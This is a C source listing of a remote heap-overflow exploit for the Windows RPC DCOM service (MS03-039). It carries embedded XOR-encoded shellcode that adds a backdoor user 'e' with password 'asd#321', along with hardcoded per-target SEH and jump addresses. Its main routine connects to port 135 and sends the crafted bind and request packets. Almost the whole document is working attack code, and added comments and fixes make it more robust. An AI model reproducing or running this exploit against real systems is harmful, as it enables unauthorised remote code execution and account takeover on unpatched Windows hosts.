Windows RPC DCOM long filename heap overflow Exploit (MS03-039)

    
#include 
                              #include 
                              #include 
                              #include 
                              #include 
                              #include 

                              #pragma comment(lib,"ws2_32")

                              /*
                               * DCE/RPC connection-oriented bind PDU, sent verbatim as the first message.
                               * Header: version 5.0, packet type 0x0B (bind), flags 0x03 (first+last
                               * fragment), NDR little-endian, frag_length 0x48 (= sizeof(bindstr)),
                               * auth_length 0, call_id 0x7F.  It proposes one presentation context:
                               * abstract syntax 000001a0-0000-0000-c000-000000000046 v0 (commonly
                               * documented as the DCOM ISystemActivator interface) over the standard
                               * NDR transfer syntax 8a885d04-1ceb-11c9-9fe8-08002b104860 v2.
                               * Whoever sends this is responsible for checking that the reply is a
                               * bind_ack (packet type 0x0C) and not a bind_nak (0x0D).
                               */
                              unsigned char bindstr[]={
                              0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00, /* RPC header */
                              0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00, /* max xmit/recv 0x16D0, assoc group 0, 1 ctx, ctx_id 1, 1 transfer syntax */
                              0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00, /* abstract syntax UUID + version 0 */
                              0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
                              0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00}; /* NDR transfer syntax UUID + version 2 */

                              /*
                               * DCE/RPC request PDU (version 5.0, packet type 0x00 = request, flags 0x03 =
                               * first+last fragment, NDR little-endian) carrying the marshalled DCOM
                               * activation call.  The filename that follows it (request2 | sc | request3)
                               * is variable-length, so main() adds sizeof(sc)-0xc to the DWORDs at byte
                               * offsets 0x8 (frag_length), 0x10 (alloc_hint), 0x80, 0x84, 0xb4, 0xb8, 0xd0
                               * and 0x18c before sending.  The inner offsets sit inside the "MARB"/"MEOW"
                               * object-reference data and are presumably nested NDR length fields; their
                               * exact meaning is not documented in this listing -- check against the IDL
                               * before moving any bytes around.  The recurring 8-byte sequence
                               * 01 10 08 00 CC CC CC CC precedes each serialized sub-structure.
                               */
                              unsigned char request1[]={
                              0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03   /* hdr: ver 5.0, type 0x00 request, flags 0x03, NDR LE, frag_length (patched) */
                              ,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00   /* call_id 0xE5, alloc_hint (patched), ctx_id 1, opnum 4 */
                              ,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45
                              ,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00
                              ,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E
                              ,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D
                              ,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41
                              ,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00   /* "MARB" */
                              ,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45
                              ,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00   /* "MEOW" */
                              ,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
                              ,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03
                              ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00
                              ,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00
                              ,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
                              ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29
                              ,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00
                              ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00
                              ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00
                              ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00
                              ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00
                              ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00
                              ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00
                              ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00
                              ,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00
                              ,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10
                              ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF
                              ,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
                              ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
                              ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
                              ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
                              ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10
                              ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09
                              ,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00
                              ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00
                              ,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00
                              ,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00
                              ,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00
                              ,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
                              ,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00
                              ,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01   /* "MEOW" */
                              ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03
                              ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00
                              ,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E
                              ,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00
                              ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
                              ,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00
                              ,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00
                              ,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00
                              ,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00
                              ,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00
                              ,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
                              ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00
                              ,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00
                              ,0x00,0x00,0x00,0x00,0x00,0x00};   /* the counted filename string (request2 | sc | request3) follows on the wire */

                              /*
                               * Head of the marshalled long filename: an NDR counted UTF-16 string.
                               *   offset 0: max count   = 0x20 characters
                               *   offset 4: offset      = 0
                               *   offset 8: actual count = 0x20 characters
                               * followed by the leading "\\" (5C 00 5C 00) of the UNC path, which
                               * continues in sc[] and ends in request3[].  0x20 is exactly the number
                               * of UTF-16 characters contributed by request2 and request3 (including
                               * request3's terminating NUL); main() adds sizeof(sc)/2 to both counts for
                               * the variable part.  main() modifies this array in place, so it must only
                               * be built once per process.
                               */
                              unsigned char request2[]={
                              0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00   /* max count, offset, actual count (lo bytes) */
                              ,0x00,0x00,0x5C,0x00,0x5C,0x00};                    /* actual count (hi bytes), L"\\\\" */

                              /*
                               * Tail of the UNC filename, UTF-16LE: "\C$\123456" followed by a run of
                               * '1' characters, ".doc", and the terminating NUL (00 00).  Appended
                               * directly after sc[] so the whole string reads
                               * "\\127.0.0.1\IPC$\<filler+payload>\C$\1234561...1.doc".
                               * The terminating NUL is counted in request2's character counts.
                               */
                              unsigned char request3[]={
                              0x5C,0x00
                              ,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00   /* "C$\12345" */
                              ,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00   /* "61111111" */
                              ,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00   /* "11111111" */
                              ,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};                               /* ".doc" + NUL */

                              /*
                               * Payload copied into sc[] at sc_offset and executed on the target.
                               * The author's claim is that it adds a local user "e" with password
                               * "asd#321"; that CANNOT be verified from this listing, so treat the bytes
                               * as untrusted and disassemble them before running this anywhere but an
                               * isolated lab.  By inspection the first bytes look like a decoder stub
                               * (jmp/call to obtain a pointer, mov cx,0x13E, xor byte [edx+ecx],0x99 in
                               * a loop), i.e. the remainder appears to be XOR-0x99 encoded -- unconfirmed.
                               * sizeof(sc_add_user) includes the string's trailing NUL and must not exceed
                               * sc_max, otherwise the copy in main() would overwrite the jmp stub in sc[].
                               */
                              //user="e" pass="asd#321"
                              unsigned char sc_add_user[]=
                              "\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x3E\x01\x80\x34\x0A\x99\xE2\xFA"   /* apparent decoder stub */
                              "\xEB\x05\xE8\xEB\xFF\xFF\xFF\x70\x31\x99\x99\x99\xC3\x21\x95\x69"
                              "\x64\xE6\x12\x99\x12\xE9\x85\x34\x12\xD9\x91\x12\x41\x12\xEA\xA5"
                              "\x9A\x6A\x12\xEF\xE1\x9A\x6A\x12\xE7\xB9\x9A\x62\x12\xD7\x8D\xAA"
                              "\x74\xCF\xCE\xC8\x12\xA6\x9A\x62\x12\x6B\xF3\x97\xC0\x6A\x3F\xED"
                              "\x91\xC0\xC6\x1A\x5E\x9D\xDC\x7B\x70\xC0\xC6\xC7\x12\x54\x12\xDF"
                              "\xBD\x9A\x5A\x48\x78\x9A\x58\xAA\x50\xFF\x12\x91\x12\xDF\x85\x9A"
                              "\x5A\x58\x78\x9B\x9A\x58\x12\x99\x9A\x5A\x12\x63\x12\x6E\x1A\x5F"
                              "\x97\x12\x49\xF3\x9A\xC0\x71\xBD\x99\x99\x99\xF1\x66\x66\x66\x99"
                              "\xF1\x99\x89\x99\x99\xF3\x9D\x66\xCE\x6D\x22\x81\x69\x64\xE6\x10"
                              "\x9A\x1A\x5F\x95\xAA\x59\xC9\xCF\x66\xCE\x61\xC9\x66\xCE\x65\xAA"
                              "\x59\x35\x1C\x59\xEC\x60\xC8\xCB\xCF\xCA\x66\x4B\xC3\xC0\x32\x7B"
                              "\x77\xAA\x59\x5A\x71\xCA\x66\x66\x66\xDE\xFC\xED\xC9\xEB\xF6\xFA"
                              "\xD8\xFD\xFD\xEB\xFC\xEA\xEA\x99\xD1\xFC\xF8\xE9\xDA\xEB\xFC\xF8"
                              "\xED\xFC\x99\xCE\xF0\xF7\xDC\xE1\xFC\xFA\x99\xDC\xE1\xF0\xED\xC9"
                              "\xEB\xF6\xFA\xFC\xEA\xEA\x99\xFA\xF4\xFD\xB9\xB6\xFA\xB9\xF7\xFC"
                              "\xED\xB9\xEC\xEA\xFC\xEB\xB9\xFC\xB9\xF8\xEA\xFD\xBA\xAA\xAB\xA8"
                              "\xB9\xB6\xF8\xFD\xFD\xB9\xBF\xBF\xB9\xF7\xFC\xED\xB9\xF5\xF6\xFA"
                              "\xF8\xF5\xFE\xEB\xF6\xEC\xE9\xB9\xF8\xFD\xF4\xF0\xF7\xF0\xEA\xED"
                              "\xEB\xF8\xED\xF6\xEB\xEA\xB9\xFC\xB9\xB6\xF8\xFD\xFD\x99";
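                              /*
                               * Byte offsets into sc[] (the UTF-16 filename template):
                               *   sc_offset       -- where sc_add_user[] is copied, just past the
                               *                      UTF-16 "127.0.0.1\IPC$\" prefix.
                               *   sc_max          -- room for the payload; sc_offset + sc_max (0x22C) is
                               *                      the 5-byte jmp stub in sc[] that jumps back to
                               *                      sc_offset, so a payload longer than this clobbers it.
                               *   jmp_addr_offset -- where targets[].dwJmpAddr is written (4 bytes).
                               *   top_seh_offset  -- where targets[].dwTopSeh is written (4 bytes).
                               * sc[] must be at least top_seh_offset + 4 bytes long.
                               *
                               * The derived macros are parenthesised: the originals expanded to bare
                               * sums, so any use inside a larger expression (e.g. 2*top_seh_offset)
                               * would have been mis-evaluated.
                               */
                              #define sc_offset       0x24
                              #define sc_max          0x208
                              #define jmp_addr_offset (sc_max + sc_offset + 0x8)
                              #define top_seh_offset  (jmp_addr_offset + 0x4)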

                              /*
                               * Template for the overlong UTF-16 filename (the overflow vector); main()
                               * fills in the payload and the target-specific addresses.  Layout by byte
                               * offset, from the byte counts in this listing:
                               *   0x000  UTF-16LE "127.0.0.1\IPC$\" -- server/share part of the UNC path
                               *          (request2 supplies the leading "\\").
                               *   0x01E  'E' filler.  sc_add_user[] is copied in at sc_offset (0x24) and
                               *          may occupy up to sc_max bytes.
                               *   0x22C  5-byte near jmp, rel32 = -0x20D, which lands on offset 0x24,
                               *          i.e. the start of the copied payload.
                               *   0x234  targets[].dwJmpAddr (jmp_addr_offset; written by main over filler)
                               *   0x238  targets[].dwTopSeh  (top_seh_offset;  written by main over filler)
                               * The string literal's trailing NUL is part of sizeof(sc) and is sent.
                               * Changing any filler length requires recomputing the jmp displacement and
                               * the macros above; main() also derives its length fixups from sizeof(sc).
                               */
                              unsigned char sc[]=
                              "\x31\x00\x32\x00\x37\x00\x2e\x00\x30\x00\x2e\x00"   /* L"127.0." */
                              "\x30\x00\x2e\x00\x31\x00\x5c\x00\x49\x00\x50\x00"   /* L"0.1\IP" */
                              "\x43\x00\x24\x00\x5c\x00"                           /* L"C$\" */
                              "EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"   /* filler; payload copied in at 0x24 */
                              "EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
                              "EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
                              "EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
                              "EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
                              "EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
                              "EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
                              "EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
                              "EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
                              "EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
                              "EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
                              "\xe9\xf3\xfd\xff\xff"                               /* jmp rel32 -0x20D -> offset 0x24 */
                              "EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE";        /* filler; dwJmpAddr/dwTopSeh patched in here */

                              /*
                               * Trailing marshalled data appended after the filename.  It opens with the
                               * same 01 10 08 00 CC CC CC CC marker that precedes each serialized
                               * sub-structure in request1; the meaning of the remaining fields is not
                               * documented in this listing.  Sent as-is: none of its fields are patched
                               * by main() (all length fixups fall inside request1).
                               */
                              unsigned char request4[]={
                              0x01,0x10
                              ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00
                              ,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C
                              ,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00
                              };

                              /*
                               * Per-target addresses, selected by the <type> argument (array index).
                               * Both values are version-specific module addresses (see the DLL version
                               * strings) and are copied into sc[] by main(): dwJmpAddr at jmp_addr_offset,
                               * dwTopSeh at top_seh_offset.  Their exact roles are not documented here;
                               * the names suggest dwTopSeh is the kernel32 address placed in the SEH chain
                               * and dwJmpAddr an OLEAUT32 gadget that transfers control into the filename
                               * buffer -- confirm in a debugger before adding a target.  New entries must
                               * be appended, since the CLI index is the array position.  `v` is a dummy
                               * instance used only for sizeof(targets)/sizeof(v).
                               */
                              struct
                              {
                              char    *os;          /* human-readable target description */
                              DWORD   dwTopSeh;     /* written at sc[top_seh_offset] */
                              char    *seh;         /* module/version dwTopSeh was taken from */
                              DWORD   dwJmpAddr;    /* written at sc[jmp_addr_offset] */
                              char    *jmp;         /* module/version dwJmpAddr was taken from */
                              }
                              targets[] =
                              {
                              { "2kEnSp4+MS03-026", 
                              0x7c54144c,
                              "kernel32.dll v5.0.2195.6688",
                              0x77a1b496,
                              "OLEAUT32.dll v2.40.4522.0"},
                              { "2kEnSp3+SomeHotFixs+MS03-026", 
                              0x77eda1f0,
                              "kernel32.dll v5.0.2195.6079",
                              0x77a1afa9,
                              "OLEAUT32.dll v2.40.4518.0"}
                              }, v;
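                              /*
                               * Add 'delta' to the 32-bit value stored at p (host byte order).
                               * memcpy is used instead of a DWORD cast because several of the offsets
                               * patched below (e.g. 0x18c) are not 4-byte aligned; the cast was an
                               * alignment/strict-aliasing violation.  Host order equals the wire's
                               * little-endian NDR on the x86 hosts this code targets.
                               */
                              static void add_dword_at(unsigned char *p, DWORD delta)
                              {
                                  DWORD v;
                                  memcpy(&v, p, sizeof v);
                                  v += delta;
                                  memcpy(p, &v, sizeof v);
                              }

                              /*
                               * Append n bytes of src to buf at *off without exceeding cap.
                               * Returns 0 on success, -1 if the copy would overflow buf (nothing copied).
                               */
                              static int append_bytes(unsigned char *buf, size_t cap, size_t *off,
                                                      const unsigned char *src, size_t n)
                              {
                                  if (n > cap - *off)
                                      return -1;
                                  memcpy(buf + *off, src, n);
                                  *off += n;
                                  return 0;
                              }

                              /* Print the usage line and the table of supported targets. */
                              static void print_usage(const char *prog)
                              {
                                  int i;
                                  printf("Usage: %s <target_ip> <type>\n", prog);
                                  for (i = 0; i < (int)(sizeof(targets) / sizeof(v)); i++)
                                      printf("<%d>   %s\n"
                                             "      TopSeh=0x%.8lx in %s\n"
                                             "      JmpAddr=0x%.8lx in %s\n",
                                             i, targets[i].os,
                                             (unsigned long)targets[i].dwTopSeh, targets[i].seh,
                                             (unsigned long)targets[i].dwJmpAddr, targets[i].jmp);
                              }

                              /*
                               * Entry point: argv[1] = target IPv4 address, argv[2] = index into targets[].
                               *
                               * Flow: validate arguments -> fill the filename template sc[] with the
                               * payload and the per-target addresses -> assemble the request PDU in buf2
                               * and patch its length fields -> connect to TCP/135, send the bind, then
                               * the request.  Returns 0 once both messages were sent (the final recv only
                               * gives a heuristic verdict), 1 on any argument, size or socket error.
                               *
                               * Fixes relative to the original:
                               *   - the target index was checked with '>' so <type> == 2 read one past
                               *     the end of targets[]; it is now rejected, as is non-numeric input;
                               *   - sizeof(sc_add_user) is compared with sc_max BEFORE the memcpy into
                               *     sc[] (it used to be checked after the copy and after connecting);
                               *   - the request is bounds-checked against sizeof buf2 while assembling;
                               *   - inet_addr() failure is reported instead of silently connecting to
                               *     255.255.255.255;
                               *   - the socket is closed and WSACleanup() is called on every path.
                               */
                              int main(int argc, char **argv)
                              {
                                  WSADATA wsa;
                                  SOCKET sock = INVALID_SOCKET;
                                  SOCKADDR_IN addr_in;
                                  unsigned long ip;
                                  unsigned char buf1[0x1000];    /* receive buffer; only its length is used */
                                  unsigned char buf2[0x1000];    /* assembled request PDU */
                                  size_t len1 = 0;               /* bytes used in buf2 */
                                  int len, i, iType;
                                  long type;
                                  char *end;
                                  DWORD delta;
                                  int rc = 1;
                                  /* Offsets in request1 whose DWORD grows with the filename: 0x8 is the
                                   * DCE/RPC frag_length, 0x10 the alloc_hint; the rest are nested length
                                   * fields inside the marshalled activation data (taken from the original
                                   * code, not from the IDL). */
                                  static const size_t len_fixups[] = {
                                      0x8, 0x10, 0x80, 0x84, 0xb4, 0xb8, 0xd0, 0x18c
                                  };

                                  printf( "MS03-039 RPC DCOM long filename heap buffer overflow exp v1\n"
                                          "Base on flashsky's MS03-026 exp\n"
                                          "Code by ey4s\n"
                                          "2003-09-16\n"
                                          "Welcome to http://www.xfocus.net\n"
                                          "Thanks to flashsky & benjurry & Dave Aitel\n"
                                          "If success, target will add a user \"e\" and password is \"asd#321\"\n\n");

                                  if (argc != 3) {
                                      print_usage(argv[0]);
                                      return 1;
                                  }

                                  /* strtol with an end check instead of atoi: "abc" no longer silently
                                   * selects target 0.  Upper bound is >= count (the original used '>'). */
                                  type = strtol(argv[2], &end, 10);
                                  if (argv[2][0] == '\0' || *end != '\0' ||
                                      type < 0 || type >= (long)(sizeof(targets) / sizeof(v))) {
                                      printf("[-] Wrong type.\n");
                                      return 1;
                                  }
                                  iType = (int)type;

                                  /* The payload must fit between sc_offset and the jmp stub in sc[];
                                   * check before copying so an oversized payload cannot corrupt sc[]. */
                                  if (sizeof(sc_add_user) > sc_max) {
                                      printf("[-] shellcode too long, exit.\n");
                                      return 1;
                                  }
                                  memcpy(&sc[sc_offset], sc_add_user, sizeof(sc_add_user));
                                  memcpy(&sc[jmp_addr_offset], &targets[iType].dwJmpAddr, 4);
                                  memcpy(&sc[top_seh_offset], &targets[iType].dwTopSeh, 4);
                                  printf("[+] Prepare shellcode completed.\n");

                                  /* request2's max-count and actual-count are UTF-16 character counts,
                                   * so the variable part of the filename contributes sizeof(sc)/2. */
                                  add_dword_at(request2, (DWORD)(sizeof(sc) / 2));
                                  add_dword_at(request2 + 8, (DWORD)(sizeof(sc) / 2));

                                  /* Assemble request1 | request2 | sc | request3 | request4 before touching
                                   * the network, bounds-checked against the send buffer. */
                                  if (append_bytes(buf2, sizeof buf2, &len1, request1, sizeof(request1)) ||
                                      append_bytes(buf2, sizeof buf2, &len1, request2, sizeof(request2)) ||
                                      append_bytes(buf2, sizeof buf2, &len1, sc, sizeof(sc)) ||
                                      append_bytes(buf2, sizeof buf2, &len1, request3, sizeof(request3)) ||
                                      append_bytes(buf2, sizeof buf2, &len1, request4, sizeof(request4))) {
                                      printf("[-] request does not fit in the send buffer, exit.\n");
                                      return 1;
                                  }

                                  /* Byte-length fixups.  The -0xc presumably accounts for the part of the
                                   * filename already counted in the fixed templates -- confirm before
                                   * changing the layout of sc[]. */
                                  delta = (DWORD)(sizeof(sc) - 0xc);
                                  for (i = 0; i < (int)(sizeof(len_fixups) / sizeof(len_fixups[0])); i++)
                                      add_dword_at(buf2 + len_fixups[i], delta);

                                  if (WSAStartup(MAKEWORD(2, 0), &wsa) != 0) {
                                      printf("WSAStartup error.Error:%d\n", WSAGetLastError());
                                      return 1;
                                  }

                                  /* inet_addr() returns INADDR_NONE for garbage; the original fed that
                                   * straight into connect(). */
                                  ip = inet_addr(argv[1]);
                                  if (ip == INADDR_NONE) {
                                      printf("[-] Bad target address: %s\n", argv[1]);
                                      goto cleanup;
                                  }
                                  memset(&addr_in, 0, sizeof addr_in);
                                  addr_in.sin_family = AF_INET;
                                  addr_in.sin_port = htons(135);
                                  addr_in.sin_addr.S_un.S_addr = ip;

                                  sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
                                  if (sock == INVALID_SOCKET) {
                                      printf("Socket failed.Error:%d\n", WSAGetLastError());
                                      goto cleanup;
                                  }
                                  if (WSAConnect(sock, (struct sockaddr *)&addr_in, sizeof(addr_in),
                                                 NULL, NULL, NULL, NULL) == SOCKET_ERROR) {
                                      printf("Connect failed.Error:%d", WSAGetLastError());
                                      goto cleanup;
                                  }
                                  printf("[+] Connect to %s:135 success.\n", argv[1]);

                                  /* 1. Bind to the interface. */
                                  len = send(sock, (const char *)bindstr, sizeof(bindstr), 0);
                                  if (len <= 0) {
                                      printf("[-] Send failed.Error:%d\n", WSAGetLastError());
                                      goto cleanup;
                                  }
                                  printf("[+] send %d bytes.\n", len);

                                  len = recv(sock, (char *)buf1, sizeof buf1, 0);
                                  if (len <= 0) {
                                      printf("[-] recv error:%d\n", WSAGetLastError());
                                      goto cleanup;
                                  }
                                  printf("[+] recv %d bytes.\n", len);
                                  /* Byte 2 of a DCE/RPC PDU is the packet type: 0x0C bind_ack, 0x0D
                                   * bind_nak.  A nak (interface not offered) would otherwise be
                                   * indistinguishable from success here. */
                                  if (len >= 3 && buf1[2] != 0x0C)
                                      printf("[-] reply is not a bind_ack (type 0x%02x); continuing anyway.\n",
                                             (unsigned)buf1[2]);

                                  /* 2. The request carrying the overlong filename. */
                                  len = send(sock, (const char *)buf2, (int)len1, 0);
                                  if (len <= 0) {
                                      printf("[-] Send failed.Error:%d\n", WSAGetLastError());
                                      goto cleanup;
                                  }
                                  printf("[+] send %d bytes.\n", len);

                                  /* Heuristic only: no reply / closed connection is read as "the service
                                   * died or the payload ran"; a normal reply is read as failure. */
                                  len = recv(sock, (char *)buf1, sizeof buf1, 0);
                                  if (len <= 0)
                                      printf("[+] Target crash or exploit success? :)\n");
                                  else
                                      printf("[-] recv %d bytes. Bad luck!\n", len);
                                  rc = 0;

                              cleanup:
                                  if (sock != INVALID_SOCKET)
                                      closesocket(sock);
                                  WSACleanup();
                                  return rc;
                              }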
                              
